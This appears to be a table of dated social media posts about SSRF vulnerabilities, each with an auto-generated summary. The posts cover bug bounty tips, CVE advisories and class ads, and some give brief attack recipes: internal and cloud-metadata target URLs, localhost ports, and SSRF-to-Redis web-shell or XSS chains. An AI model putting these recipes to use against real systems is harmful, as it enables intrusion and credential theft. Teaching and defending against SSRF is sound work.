| 291 | 2025-07-06 12:43:34 UTC | Breaking down a SSRF bypass using open redirect chaining reveals how trusting external redirects can lead to internal network scans and access to sensitive data. Proper validation and allowlisting are key to prevention. #OpenRedirect #SSRF | The content discusses how combining SSRF bypass with open redirect chaining can lead to internal network scans and unauthorized access to sensitive data. It emphasizes the risks of trusting external redirects and highlights the importance of implementing proper validation and allowlisting to prevent such security breaches. The post underscores the significance of addressing vulnerabilities related to open redirects and SSRF to safeguard against potential exploitation. |
| 292 | 2025-07-06 04:33:22 UTC | Class Complete! Yesterday we wrapped up an epic session on SSRF exploitation including payloads live demos and real-world tricks. Wanna fly with us together from the Next Class? Call/Message Us 91-8790407216 Email | The content highlights the completion of a session on SSRF exploitation with demonstrations of payloads and real-world tricks. It invites participation in the next class and provides contact information for inquiries: call/message +91-8790407216 or email. |
| 293 | 2025-07-04 21:38:20 UTC | Just dropped a new write-up in my Power Platform research series. This time? OneNote token leakage. Yep its still exploitable. Nope its not getting fixed. Read it on Zenity Labs: Enjoy the read #SSRF #PowerPlatform #OneNote #MSRC #ZenityLabs | A new write-up in the Power Platform research series discusses OneNote token leakage, highlighting that the issue is still exploitable and won't be fixed. The content can be found on Zenity Labs. The post mentions hashtags like #SSRF, #PowerPlatform, #OneNote, #MSRC, and #ZenityLabs. |
| 294 | 2025-07-03 13:23:41 UTC | Excited to start my WebHacking journey with @HackingHub_io! Ready to learn grow and hack some web apps! #BugBounty #EthicalHacking #NahamSec #WebSecurity #HackingHub #Infosec #CyberSecurity #BugBountyTips #XSS #SSRF #CTF #Pentesting #HackThePlanet | The content expresses excitement about starting a web hacking journey with @HackingHub_io to learn, grow, and hack web apps. It mentions hashtags related to bug bounty, ethical hacking, web security, infosec, cybersecurity, bug bounty tips, XSS, SSRF, CTF, pentesting, and hacking the planet. The individual is eager to engage in activities related to cybersecurity and hacking, showcasing enthusiasm for exploring these fields. |
| 295 | 2025-07-03 12:21:48 UTC | Hacker says DarkForums is leaking IPs | A hacker has claimed that DarkForums is exposing users' IP addresses. The information was shared through a link provided in the content. |
| 296 | 2025-07-03 06:28:21 UTC | New Writeup Alert! "One SSRF to Rule Them All" by Ott3rly is now live on IW! Check it out here: #cybersecurity #informationsecurity #bugbounty #bugbountywriteup #ssrf | A new writeup titled "One SSRF to Rule Them All" by Ott3rly is now available on IW. The content focuses on cybersecurity, information security, bug bounty programs, and SSRF vulnerabilities. Readers are encouraged to check out the writeup for insights and information on this topic. #cybersecurity #informationsecurity #bugbounty #bugbountywriteup #ssrf. |
| 297 | 2025-07-02 17:23:23 UTC | New video alert! We walk you through an SSRF vulnerability exploited step-by-step to achieve RCE. Practical detailed and perfect for pentesters & bug bounty hunters! Video: #Cybersecurity #SSRF #RCE #BugBounty | A new video demonstrates exploiting an SSRF vulnerability to achieve Remote Code Execution (RCE) in a step-by-step guide, ideal for pentesters and bug bounty hunters. The video provides practical and detailed insights into the process. It focuses on cybersecurity, SSRF, RCE, and bug bounty topics. |
| 298 | 2025-07-02 14:18:17 UTC | Ever wondered how attackers exploit SSRF to access internal systems? Our latest article breaks it all downtools techniques and mitigation strategies. Read now: #SSRF #CyberSecurity #RedTeamOps #Infosec #CyberWarFareLabs #Article #SecurityResearch | The content discusses how attackers exploit Server-Side Request Forgery (SSRF) to access internal systems, detailing tools, techniques, and mitigation strategies. The article provides insights into SSRF vulnerabilities and ways to protect against them. It is relevant for those interested in cybersecurity, Red Team Operations, and security research. The link provided directs readers to the full article for further information. |
| 299 | 2025-07-02 13:19:00 UTC | Union-Based SQL Injection in 60 Seconds See how a single UNION SELECT reveals sensitive data Real demo. Real database dump. Real threat. Watch the full demo now no jargon just clarity: youtube.com/shorts/FTx4UEJ #sqli #bugbounty #bug #ssrf #sqlinjection #cybersecurity | The content discusses Union-Based SQL Injection demonstrated in a 60-second video showing how a single UNION SELECT can expose sensitive data through a real database dump. The video aims to raise awareness about this security threat without using technical jargon. It encourages viewers to watch the full demo on YouTube for clarity. The post includes hashtags related to SQL injection, bug bounty, SSRF, and cybersecurity. |
| 300 | 2025-06-28 15:03:22 UTC | Server-Side Bugs That Pay Big SSRF (internal request abuse) SSTI (template injection) XXE (XML Entity Injection) Log4Shell-style payloads Blind bugs with Burp Collaborator Quiet bugs massive impact. #BugBounty #SSRF #EthicalHacking #bugbountytip | The content discusses lucrative server-side bugs like SSRF, SSTI, XXE, Log4Shell-style payloads, and blind bugs with Burp Collaborator. These vulnerabilities can have a significant impact and are valuable for bug bounty programs and ethical hacking. Emphasizing the importance of identifying and addressing these issues, the post highlights their potential for exploitation and the need for vigilance in cybersecurity. |
| 301 | 2025-06-28 06:03:39 UTC | Live SSRF Demo at Cubeesec Weekly Class! Internal IPs? Metadata? IAM tokens? All exposed in seconds. We dont teach theorywe attack it. Wanna Join Us: 91 8790407216 cubeesec.group@gmail.com cubeesec.com (Coming Soon) #SSRF #cybersecurity #cubeesec | Cubeesec is offering a live SSRF demo showcasing the exposure of internal IPs, metadata, and IAM tokens within seconds. They focus on practical attacks rather than theory in their classes. Contact details for joining include a phone number, email, and website. The demonstration aims to highlight cybersecurity vulnerabilities and techniques. |
| 302 | 2025-06-27 10:58:18 UTC | Understanding Server Side Request Forgery (SSRF) is crucial for web security! By validating inputs whitelisting domains and monitoring requests we can mitigate risks and protect sensitive data. Let's stay vigilant! #CyberSecurity #SSRF @VisakhVijayan | Understanding Server Side Request Forgery (SSRF) is vital for web security. Mitigate risks by validating inputs, whitelisting domains, and monitoring requests to protect sensitive data. Stay vigilant to enhance cybersecurity. #SSRF #CyberSecurity. |
| 303 | 2025-06-27 07:03:50 UTC | Unauthenticated SSRF Vulnerability in Octo STS - CVE-2025-52477. Update to version 0.5.3 or later to protect against SSRF attacks and safeguard sensitive data. Read more: #SSRF #CVE202552477 #CyberSecurity #Vulert #PatchNow | An unauthenticated SSRF vulnerability (CVE-2025-52477) in Octo STS is identified. To safeguard sensitive data, update to version 0.5.3 or later. Protect against SSRF attacks by applying the patch promptly. Stay informed about cybersecurity threats and vulnerabilities. #SSRF #CVE202552477 #CyberSecurity #Vulert #PatchNow. |
| 304 | 2025-06-26 09:56:12 UTC | CISA Warns of Vulnerabilities in ControlID iDSecure Software Allowing Authentication Bypass | CISA issued a warning about vulnerabilities in ControlID iDSecure software that could lead to authentication bypass. The vulnerabilities could potentially allow unauthorized access to systems using the software. Organizations using this software are advised to update to the latest version to mitigate the risk of exploitation. |
| 305 | 2025-06-25 16:48:34 UTC | we exploited an SSRF vulnerability leading to internal port enumeration. Watch our deep dive and walkthrough: youtu.be/wjQrAsQgL2c #BugBounty #hackerone #BugBountytips #CyberSecurity #ssrf | The content discusses exploiting a Server-Side Request Forgery (SSRF) vulnerability to perform internal port enumeration. A deep dive and walkthrough of the exploit are provided in a video linked at youtu.be/wjQrAsQgL2c. The post includes hashtags related to Bug Bounty, HackerOne, Bug Bounty tips, Cybersecurity, and SSRF. The focus is on demonstrating the exploitation of the vulnerability for educational and security awareness purposes. |
| 306 | 2025-06-25 16:48:33 UTC | Just solved another @theXSSrat lab! This time we exploited an SSRF vulnerability leading to internal port enumeration. Watch our deep dive and walkthrough: youtu.be/wjQrAsQgL2c More lab solutions coming soon stay tuned! #SSRF #Cybersecurity #BugBounty | A cybersecurity enthusiast successfully exploited an SSRF vulnerability in an @theXSSrat lab, showcasing internal port enumeration. A deep dive and walkthrough video of the exploit is available at youtu.be/wjQrAsQgL2c. More lab solutions are on the way, so followers are encouraged to stay tuned for updates. The post highlights the importance of SSRF awareness in cybersecurity and bug bounty hunting. |
| 307 | 2025-06-25 04:48:19 UTC | 3. No Silver Bullets Theres no silver bullet not in folklore not in AppSec. Security isnt a one-liner. Its a process: Think. Test. Break. Fix. Repeat. Full post: Lab & code: #SSRF #AppSec #NoSilverBullet #SecureCoding | The content emphasizes that there are no quick fixes or easy solutions in security, whether in folklore or application security (AppSec). Security is described as a continuous process involving thinking, testing, breaking, fixing, and repeating. The post highlights the importance of this iterative approach in secure coding practices, particularly in addressing issues like Server-Side Request Forgery (SSRF). |
| 308 | 2025-06-24 19:48:29 UTC | SSRF XSS via PDF Generator 1 App accepts user URLs renders them to PDF (server-side) 2 Attacker hosts HTML with 3 App fetches malicious page and renders it 4 PDF preview opens with embedded JS SSRF turns into stored XSS #bugbounty #ssrf | The content discusses a security vulnerability where a PDF generator application accepts user URLs, rendering them to PDF server-side. An attacker can exploit this by hosting malicious HTML, tricking the app to fetch and render it, leading to a PDF preview with embedded JavaScript. This vulnerability allows Server-Side Request Forgery (SSRF) to escalate into Stored Cross-Site Scripting (XSS). The issue is highlighted for bug bounty purposes. |
| 309 | 2025-06-23 07:38:32 UTC | Weekly Security Sync Complete! This week we dived into the process approach & working of SSRF (Server-Side Request Forgery) No charges just pure knowledge! Call/Message Us 91-8790407216 Email cubeesec.group@gmail.com #ssrf #infosec #bugbounty | The content highlights the completion of the Weekly Security Sync focusing on SSRF (Server-Side Request Forgery), offering knowledge without charges. Contact details for further information are provided. The post emphasizes the importance of understanding SSRF in the context of information security and bug bounty programs. |
| 310 | 2025-06-23 05:38:47 UTC | Weekly Security Sync Complete! This week we dived into the process approach & working of SSRF (Server-Side Request Forgery) No charges just pure knowledge! 91-8790407216 cubeesec.group@gmail.com #cybersecurity #ssrf #infosec #bugbounty | The content discusses the completion of the weekly security sync focusing on SSRF (Server-Side Request Forgery). It emphasizes sharing knowledge without any charges, providing contact information for further inquiries. The post includes hashtags related to cybersecurity, SSRF, infosec, and bug bounty. The main points are the exploration of SSRF processes, approach, and operations, along with contact details for cubeesec.group. |
| 311 | 2025-06-22 18:48:26 UTC | SSRF via Image URL Upload 1 App fetches metadata from user-supplied image URLs 2 Payload: http://169(.)254(.)xx.xx/latest/meta-data/ 3 No outbound request filtering 4 Internal AWS metadata leaked Image URL Internal network access #bugbounty #ssrf | The content discusses a security vulnerability known as SSRF (Server-Side Request Forgery) through image URL upload. Key points include an app fetching metadata from user-supplied image URLs, a payload example leading to internal AWS metadata leakage, lack of outbound request filtering, and the risk of granting internal network access through image URLs. The post highlights the potential for exploiting this vulnerability for bug bounty rewards and includes relevant hashtags. |
| 312 | 2025-06-21 16:33:20 UTC | This is how top hunters earn $500 $1K even $5K per bug. #BugBounty #ReconTips #XSS #SSRF #IDOR #AssetDiscovery #WebSecurity #InfoSec #EthicalHacking #RedTeam #HackerWorkflow | Top hunters in bug bounty programs can earn significant rewards, ranging from $500 to $5K per bug. They utilize various techniques like ReconTips, XSS, SSRF, IDOR, AssetDiscovery, and focus on WebSecurity, InfoSec, EthicalHacking, RedTeam, and HackerWorkflow. These experts leverage their skills to identify vulnerabilities and report them to organizations for rewards. |
| 313 | 2025-06-20 07:28:22 UTC | SSRF: Server-Side Request Forgery Trick the server into calling internal services for you. Simple trick massive damage. Bypass firewalls Access internal IPs Steal cloud metadata #SSRF #cybersecurity #bugbounty #websecurity #cloudsecurity #ethicalhacking #infosec | The content discusses SSRF (Server-Side Request Forgery), a technique to trick servers into accessing internal services, potentially causing significant damage. It highlights the ability to bypass firewalls, access internal IPs, and steal cloud metadata. The post emphasizes the seriousness of SSRF in cybersecurity, bug bounty programs, web security, cloud security, ethical hacking, and information security. The content warns about the risks associated with SSRF and the importance of safeguarding against such vulnerabilities. |
| 314 | 2025-06-19 23:28:14 UTC | Day 43: CSRF SSRF & Clickjacking Attacks Security is often broken not by what users do but by what their browsers or servers are tricked into doing. Todays deep dive covered 3 trust-based web attacks #CyberSecurity #WebSecurity #CSRF #SSRF #Clickjacking | The content discusses CSRF, SSRF, and Clickjacking attacks, highlighting that security breaches often occur due to actions tricked browsers or servers take, rather than user actions. The focus is on trust-based web attacks, emphasizing the importance of cybersecurity measures. The post aims to raise awareness about these threats and their implications for web security. |
| 315 | 2025-06-19 10:11:49 UTC | Open Next for Cloudflare SSRF Vulnerability Let Attackers Load Remote Resources from Arbitrary Hosts | The content discusses a Server-Side Request Forgery (SSRF) vulnerability in Open Next for Cloudflare, allowing attackers to load remote resources from any host. This vulnerability can be exploited by attackers to manipulate the server into making unauthorized requests to external systems, potentially leading to data breaches or system compromise. It highlights the importance of promptly addressing and patching such vulnerabilities to prevent unauthorized access and protect sensitive information. |
| 316 | 2025-06-19 05:46:26 UTC | Open Next SSRF Flaw in Cloudflare Lets Hackers Fetch Data from Any Host | A new SSRF (Server-Side Request Forgery) vulnerability in Cloudflare allows hackers to retrieve data from any host. This flaw poses a security risk as it enables unauthorized access to sensitive information. It is important for Cloudflare to address and patch this vulnerability promptly to prevent exploitation by malicious actors. |
| 317 | 2025-06-19 04:23:18 UTC | @yousukezan . This causes content controlled by the attacker () to be served through the victim's domain (). #SSRF #SecurityFlaw | The content discusses a security flaw known as Server-Side Request Forgery (SSRF), where an attacker can manipulate a server to serve content through a victim's domain. This poses a risk as the attacker can control the content being served. The tweet mentions @yousukezan and includes a link for more information on the SSRF vulnerability. |
| 318 | 2025-06-19 02:23:15 UTC | A critical SSRF flaw (CVE-2025-6087) in @opennextjs/cloudflare allows unauthenticated users to proxy arbitrary remote content via /_next/image endpoint. Update to v1.3.0. #SSRF #Cloudflare #NextJS #Cybersecurity #Vulnerability | A critical SSRF flaw (CVE-2025-6087) in @opennextjs/cloudflare enables unauthenticated users to proxy remote content via /_next/image endpoint. Update to v1.3.0 to address the vulnerability. #SSRF #Cloudflare #NextJS #Cybersecurity. |
| 319 | 2025-06-18 18:23:09 UTC | Finding SSRFs in Azure DevOps - Part 2 #SSRF #AzureDevOps #AzureSecurity #DNSRebinding #SourceCodeDebugging binsec.no/posts/2025/05/ | The content discusses the identification of Server-Side Request Forgery (SSRF) vulnerabilities in Azure DevOps, focusing on Azure Security, DNS Rebinding, and Source Code Debugging. It is part 2 of a series and provides insights into detecting SSRFs within Azure DevOps environments. The article can be found on binsec.no/posts/2025/05/. |
| 320 | 2025-06-18 12:18:36 UTC | SSRF via PDF Generator 1 App fetches URLs to generate PDFs (e.g. invoices reports) 2 Attacker supplies internal URL (e.g. http://localhost/admin) 3 PDF engine fetches it server-side 4 Leaks internal content in rendered PDF SSRF data exposure #bugbounty #ssrf | The content discusses a security vulnerability known as Server-Side Request Forgery (SSRF) via a PDF Generator app. The vulnerability allows an attacker to supply internal URLs, which the PDF engine fetches server-side, leading to the leakage of internal content in the generated PDFs. This SSRF issue results in data exposure. The post highlights the risk posed by this vulnerability and suggests it as a target for bug bounty programs. |
| 321 | 2025-06-17 14:18:32 UTC | بعضی کتابخونه ها (مثلا image downloaderها یا PDF generatorها) بدون فیلتر روی URL کار می کنن. اگه کاربر بتونه URL بده می تونه http://localhost:3306 بزنه و به دیتابیس داخلی یا AWS metadata وصل شه. اسمش SSRFه. به این نکات خیلی دقت کنید! #PHP #SSRF #CloudSecurity | Some libraries like image downloaders or PDF generators work without filtering URLs, allowing users to potentially connect to internal databases or AWS metadata by inputting URLs like http://localhost:3306. This vulnerability is known as Server-Side Request Forgery (SSRF). It's crucial to pay attention to these points for security. The content emphasizes the importance of being cautious about SSRF risks in PHP applications and cloud security. |
| 322 | 2025-06-16 08:13:32 UTC | 4 #GeoServer 2.24.4 and 2.25.2 vulnerable to #SSRF via demo request if Proxy Base URL unset. Update to stay protected (Reference: CVE-2024-29198) | GeoServer versions 2.24.4 and 2.25.2 are susceptible to Server-Side Request Forgery (SSRF) attacks through demo requests when the Proxy Base URL is not set. To mitigate this vulnerability, users are advised to update their GeoServer installations. The reference for this issue is CVE-2024-29198. |
| 323 | 2025-06-15 04:03:26 UTC | Hunting for SSRF? Try manipulating URLs in your app (think image uploads webhooks) to target internal IPs (127.0.0.1 192.168.x.x). See if the server leaks internal info or allows unauthorized actions! #SSRF #WebSecurity | The content discusses hunting for Server-Side Request Forgery (SSRF) vulnerabilities by manipulating URLs in applications to target internal IPs like 127.0.0.1 and 192.168.x.x. This can reveal if the server leaks internal information or allows unauthorized actions. The focus is on testing web security by exploiting potential SSRF issues related to image uploads and webhooks. #SSRF #WebSecurity. |
| 324 | 2025-06-14 20:03:19 UTC | URL schemes: Not all links are http:// or https:// Some can be dangerous #URL #BugBounty #BugBountytips #XSS #SSRF #OpenRedirect | The content discusses URL schemes, highlighting that not all links are safe with the common http:// or https:// prefixes. Some URLs can be dangerous, posing risks such as XSS, SSRF, and Open Redirect vulnerabilities. The post emphasizes the importance of being cautious with URLs and understanding potential security threats associated with different URL schemes. It also suggests that users should be vigilant, especially in the context of Bug Bounty programs. |
| 325 | 2025-06-14 13:03:57 UTC | SSRF Hunting 101: Can you trick a server into making requests for you? Look for URLs or endpoints that accept URLs as input. Try local IPs (127.0.0.1) internal services or metadata endpoints. #SSRF #WebSec | The content discusses SSRF (Server-Side Request Forgery) hunting by tricking a server into making requests for the attacker. It suggests looking for URLs or endpoints that accept URLs as input, trying local IPs like 127.0.0.1, internal services, or metadata endpoints. The focus is on exploiting vulnerabilities to manipulate servers into making unauthorized requests. The content also includes hashtags related to SSRF and Web Security. |
| 326 | 2025-06-13 18:58:46 UTC | #ThreatProtection #CVE-2025-4123 #Grafana #XSS and Full-Read #SSRF #vulnerability read more about Symantec's protection: broadcom.com/support/securi | The content highlights a vulnerability related to Grafana, specifically XSS and SSRF, identified as CVE-2025-4123. It suggests learning more about Symantec's protection measures for this threat by visiting broadcom.com/support/security. The post emphasizes the importance of threat protection and directs readers to further information on safeguarding against these vulnerabilities. |
| 327 | 2025-06-13 17:58:34 UTC | Good old 127.1 #ssrf | The content mentions "Good old 127.1" and includes the hashtag #ssrf and a link (https://ift.tt/c6F4K0p). The term "127.1" is often used to refer to the loopback address in networking (127.0.0.1). The hashtag #ssrf could be related to Server-Side Request Forgery, a type of vulnerability. The link provided may lead to further information or resources related to these topics. |
| 328 | 2025-06-11 23:48:37 UTC | Beware of the silent danger - SSRF! It can turn your own server into a weapon against you! Understand its mechanisms and secure your network. Stay informed about this #OWASP Top 10 vulnerability! #WebSecurity #SSRF | The content warns about SSRF, a silent danger that can make your server a weapon against you. Understanding SSRF mechanisms is crucial to secure your network. Stay informed about this OWASP Top 10 vulnerability to enhance web security and protect against SSRF attacks. #WebSecurity #SSRF. |
| 329 | 2025-06-11 15:56:18 UTC | Apache Kafka Arbitrary File Read and SSRF Vulnerability (CVE-2025-27817) | The content discusses a security vulnerability in Apache Kafka, identified as CVE-2025-27817, which allows attackers to perform arbitrary file reads and Server-Side Request Forgery (SSRF) attacks. This vulnerability could potentially lead to unauthorized access to sensitive information or resources. It is crucial for users of Apache Kafka to be aware of this issue and take necessary precautions to mitigate the risk of exploitation. |
| 330 | 2025-06-11 06:48:33 UTC | SSRF Redis RCE 1 App fetches URLs from user input (no whitelist) 2 Attacker targets (Redis) 3 Sends payload to write cron job or web shell 4 Redis accepts raw commands code execution SSRF open Redis = full server pwn #bugbounty #ssrf #rce | The content discusses a security vulnerability known as SSRF leading to Redis Remote Code Execution (RCE). The vulnerability arises from an application fetching URLs from user input without a whitelist. An attacker can exploit this by targeting Redis, sending a payload to execute commands like writing a cron job or web shell. Since Redis accepts raw commands, this can lead to code execution. The combination of SSRF and an open Redis server can result in a full server compromise. The post highlights the severity of the bug and mentions relevant hashtags like #bugbounty, #ssrf, and #rce. |
| 331 | 2025-06-10 20:43:49 UTC | Magoo a Python-based tool for SSRF (Server-Side Request Forgery) vulnerability hunting and unauthorized port scanning. github.com/JoshuaProvoste #BugBounty #Hacking #SSRF | Magoo is a Python tool designed for finding SSRF vulnerabilities and conducting unauthorized port scanning. It is available on GitHub under the username JoshuaProvoste. The tool is useful for Bug Bounty programs and hacking activities related to SSRF. It can assist in identifying security weaknesses in web applications by testing for SSRF vulnerabilities and scanning for open ports without authorization. |
| 332 | 2025-06-10 05:43:32 UTC | SSRF attacks simplified. This post breaks down how attackers target EC2 metadata and how to stay a step ahead. Cyber doesnt have to feel complicated. Follow @Cytrusst for weekly security insights that just make sense. #CyberSecurity #CloudSecurity #SSRF #Infosec #Cytrusst | This content simplifies SSRF attacks, explaining how attackers target EC2 metadata and how to prevent them. It emphasizes making cybersecurity less complex. Follow @Cytrusst for straightforward security insights. Key hashtags: #CyberSecurity #CloudSecurity #SSRF #Infosec #Cytrusst. |
| 333 | 2025-06-09 22:38:40 UTC | Found a critical SSRF during a pentest. PDF export accepted raw HTML so I injected an | A critical Server-Side Request Forgery (SSRF) vulnerability was discovered during a penetration test. The vulnerability was found in a PDF export feature that accepted raw HTML input, allowing for injection of malicious code. |
| 334 | 2025-06-09 06:33:23 UTC | @_curious_Dev_ Great question! Input validation & whitelisting are key first steps. Also consider using a proxy server to control outbound requests and limit access to internal resources. #SSRF #webappsecurity | The content emphasizes the importance of input validation, whitelisting, and using a proxy server for web application security. These measures help prevent security vulnerabilities like Server-Side Request Forgery (SSRF) by controlling outbound requests and limiting access to internal resources. By implementing these steps, developers can enhance the security of their web applications. |
| 335 | 2025-06-08 18:38:22 UTC | I completed the Web Security Academy lab: SSRF with blacklist-based input filter. This was fun and surprisingly easy #cybersecurity #portswigger #SSRF @WebSecAcademy @ireteeh @Cyblackorg portswigger.net/web-security/s | The content discusses completing a Web Security Academy lab on SSRF with a blacklist-based input filter, finding it fun and surprisingly easy. The post includes hashtags related to cybersecurity and mentions of PortSwigger, Web Security Academy, and other relevant accounts. The link provided likely leads to additional information or resources related to the lab completion. |
| 336 | 2025-06-08 04:33:47 UTC | @sushicomabacate Já o SSRF permite que o invasor manipule a aplicação para realizar requisições HTTP maliciosas em nome do servidor acessando recursos internos da rede que não estão expostos publicamente. Isso pode comprometer serviços de banco de dados ou APIs internas. #SSRF | The content discusses SSRF (Server-Side Request Forgery), where attackers manipulate applications to make malicious HTTP requests on behalf of the server, accessing internal network resources not publicly exposed. This vulnerability can compromise internal database services or APIs. The post highlights the risks associated with SSRF attacks and provides a link for further information. |
| 337 | 2025-06-06 20:28:25 UTC | Day 18 Full-Time Bug Bounty - Learned some cool stuff in JavaScript today starting to really get how things work behind the scenes. - Found a possible SSRF on a public H1 program hope its not a dupe Total Report Payouts: $0 #BugBounty #SSRF | Day 18 of full-time bug bounty work involved learning about JavaScript intricacies and discovering a potential SSRF on a public H1 program. The individual is gaining a deeper understanding of how things operate behind the scenes. The total report payouts for the day were $0. #BugBounty #SSRF. |
| 338 | 2025-06-06 15:28:23 UTC | SSRF Cloud Metadata 1 URL input not properly validated 2 Attacker sends request to 3 Server-side request fetches cloud credentials 4 Credentials used to access internal services or take over infra #SSRF Cloud hack #BugBounty | The content discusses a Server-Side Request Forgery (SSRF) vulnerability where the URL input is not validated correctly. An attacker can exploit this by sending a request, allowing them to retrieve cloud credentials through a server-side request. These credentials can then be used to access internal services or take control of the infrastructure. The post highlights the potential for SSRF to lead to a cloud hack and mentions it as a target for Bug Bounty programs. |
| 339 | 2025-06-05 23:21:42 UTC | Exploiting OS command injection vulnerabilities to exfiltrate data with Burp Suite | The content discusses utilizing OS command injection vulnerabilities to extract data using Burp Suite, a popular web application security testing tool. By exploiting these vulnerabilities, attackers can execute arbitrary commands on the underlying operating system, potentially leading to data exfiltration. Burp Suite assists in identifying and exploiting these vulnerabilities, highlighting the importance of addressing and securing such weaknesses to prevent unauthorized access and data breaches. |
| 340 | 2025-06-05 08:18:44 UTC | New video out! Bypassed SSRF filters using internal routing logic. Blacklist? Useless. Accessed internal services via crafted requests. Watch the full breakdown youtu.be/4WOlWBXLI-A #SSRF #WebSecurity #BugBounty #InfoSec #Hacking #CyberSecurity | A new video demonstrates bypassing SSRF filters using internal routing logic, rendering blacklists ineffective. The video showcases accessing internal services through crafted requests. The full breakdown is available at the provided link. The content focuses on SSRF, web security, bug bounty, infosec, hacking, and cybersecurity. |
| 341 | 2025-06-05 04:18:12 UTC | SSRF Hunting 101: Can you make the server request itself (or internal resources) via a URL? Try manipulating parameters meant for external APIs. If it works you've got SSRF! #SSRF #WebSecurity | The content discusses SSRF (Server-Side Request Forgery) hunting by attempting to make the server request itself or internal resources via a URL. It suggests manipulating parameters intended for external APIs to test for SSRF vulnerabilities. If successful, it indicates the presence of SSRF, a security risk. The post emphasizes the importance of web security and provides a basic guide for identifying SSRF issues. #SSRF #WebSecurity. |
| 342 | 2025-06-04 21:23:29 UTC | Our researchers discovered a critical SSRF XSS chain: 1.SSRF abused to fetch internal JS endpoint 2.Injected payload reflected in an internal admin panel 3.Admin loads it via | Researchers found a significant security vulnerability involving SSRF and XSS. The exploit chain involved abusing SSRF to access an internal JS endpoint, injecting a payload that appeared in an internal admin panel, and then being loaded by an admin. This chain highlights the potential risks of SSRF and XSS vulnerabilities when combined, showcasing how attackers can exploit these weaknesses to gain unauthorized access to internal systems. |
| 343 | 2025-06-04 06:13:38 UTC | #Cycatz #cybersecurity Blind SSRF More.... shorturl.at/K2uOY #cyberattacksurfacemanagement #darkwebmonitoring #SurfaceWebMonitoring #mobilesecurity #emailsecurity #cloudsecurity #governanceriskcompliance #vendorriskmanagement #brandmonitoring #incedentreport #bug #SSRF | The content discusses various aspects of cybersecurity, including Blind SSRF, cyber attack surface management, dark web monitoring, mobile security, email security, cloud security, governance risk compliance, vendor risk management, brand monitoring, incident reporting, bugs, and SSRF. It emphasizes the importance of these elements in maintaining robust cybersecurity measures. The provided link likely leads to more detailed information on these topics. |
| 344 | 2025-06-04 06:13:37 UTC | New Grafana Exploit CVE-2025-4123 XSS SSRF Open redirect Account Hijack A full exploit chain that breaks Grafana wide open! Watch the full breakdown: youtu.be/tf8_Tuj0huQ?si #BugBounty #CyberSecurity #Grafana #XSS #SSRF #CVE2025 | A new Grafana exploit CVE-2025-4123 has been discovered, involving XSS, SSRF, open redirect, and account hijack vulnerabilities. The exploit chain poses a significant threat to Grafana security. A detailed breakdown of the exploit is available in a video. This discovery is relevant to Bug Bounty programs, Cybersecurity, and Grafana users. The exploit's severity is highlighted by the use of multiple attack vectors. |
| 345 | 2025-06-03 10:18:21 UTC | Web Security Alert Explore critical vulnerabilities: SSRF: Exploits server requests to access internal systems. Open Redirects: Facilitate phishing by redirecting users to malicious sites. Dive deeper: #CyberSecurity #WebSecurity #SSRF | The content warns about critical web security vulnerabilities: SSRF exploits server requests to access internal systems, while Open Redirects can facilitate phishing by redirecting users to malicious sites. The message encourages further exploration of cybersecurity topics like SSRF. |
| 346 | 2025-06-02 08:08:23 UTC | 2 #Grafana users: Versions before 12.0.1 allow reflected XSS open redirects leading to #SSRF risks. Update ASAP (Reference: CVE-2025-4123). | Users of Grafana versions prior to 12.0.1 are at risk of reflected XSS and open redirects, which can lead to SSRF vulnerabilities. It is crucial to update to the latest version immediately to mitigate these security risks. The vulnerability is identified as CVE-2025-4123. |
| 347 | 2025-06-02 03:08:43 UTC | Esri patches a critical SSRF vulnerability in Portal for ArcGIS allowing unauthenticated remote attackers to bypass protections and access internal services. #Esri #ArcGIS #SSRF #Cybersecurity securityonline.info/critical-ssrf- | Esri addressed a severe SSRF vulnerability in Portal for ArcGIS, enabling unauthenticated remote attackers to evade security measures and reach internal services. The patch is crucial for preventing unauthorized access. #Esri #ArcGIS #SSRF #Cybersecurity. |
| 348 | 2025-06-01 20:03:47 UTC | Hunting for SSRF? Try injecting URLs in parameters! Look for endpoints that fetch data. Test with internal IPs (127.0.0.1) or your own server to see if they're vulnerable. #SSRF #WebSecurity | The content discusses hunting for Server-Side Request Forgery (SSRF) vulnerabilities by injecting URLs in parameters of endpoints that fetch data. It suggests testing with internal IPs like 127.0.0.1 or your own server to check for vulnerability. The focus is on identifying and exploiting SSRF issues for improved web security. #SSRF #WebSecurity. |
| 349 | 2025-06-01 09:51:47 UTC | Portal for ArcGIS Security 2025 Update 2 Patch | The content refers to an update patch for Portal for ArcGIS Security 2025. It is recommended to apply this patch to enhance the security features of the portal. The provided link directs users to access and install the update. |
| 350 | 2025-05-31 12:33:53 UTC | SSRF hunting? Try manipulating URLs in your target app! See if you can force it to make requests to internal resources or external IPs. Watch out for redirects & error messages! #SSRF #WebSecurity | The content suggests using URL manipulation to hunt for Server-Side Request Forgery (SSRF) vulnerabilities in a target application. By manipulating URLs, one can attempt to make the application send requests to internal resources or external IPs. It advises being cautious of redirects and error messages while conducting this testing for SSRF vulnerabilities. The post emphasizes the importance of web security and includes relevant hashtags like #SSRF and #WebSecurity. |
| 351 | 2025-05-31 05:28:49 UTC | Great explanation of CSRF vs SSRF Key difference: CSRF is happening more in the browser and directly to the main server. SSRF is happening on the backend (behind the scenes) from one server to the other #infosec #CyberSecurity #csrf #ssrf @snyksec youtu.be/rgDq_Bi64OM?si | The content provides a clear explanation of the key difference between CSRF and SSRF. CSRF occurs more in the browser, affecting the main server directly, while SSRF takes place on the backend between servers. The post emphasizes the importance of understanding these distinctions for information security and cybersecurity. The content is shared with relevant hashtags and a link to a video for further explanation. |
| 352 | 2025-05-30 12:23:43 UTC | New Article Alert! Explore UNC2903 Cloud Intrusion TTPs and how they exploited Adminer SSRF for metadata harvesting. Stay informed stay secure. Read now: #CyberWarfareLabs #CloudSecurity #UNC2903 #SSRF #InfoSec #TTPAnalysis #Article | The content alerts readers to a new article discussing UNC2903 Cloud Intrusion TTPs and their use of Adminer SSRF for metadata harvesting. It emphasizes staying informed and secure in the realm of cybersecurity. The article covers topics like CyberWarfareLabs, Cloud Security, InfoSec, and TTP Analysis. Readers are encouraged to read the full article for more insights and information. |
| 353 | 2025-05-30 07:28:39 UTC | Critical CVE-2025-4967 in Esri Portal for ArcGIS (v11.4 & earlier) allows unauthenticated SSRFCVSS score: 9.1. Patch now to secure your systems. Details #cybersecurity #infosec #ArcGIS #SSRF #CVE20254967 | A critical CVE-2025-4967 vulnerability in Esri Portal for ArcGIS (v11.4 & earlier) enables unauthenticated SSRF with a CVSS score of 9.1. Immediate patching is advised to enhance system security. For more information, visit the provided link. #cybersecurity #infosec #ArcGIS #SSRF #CVE20254967 |
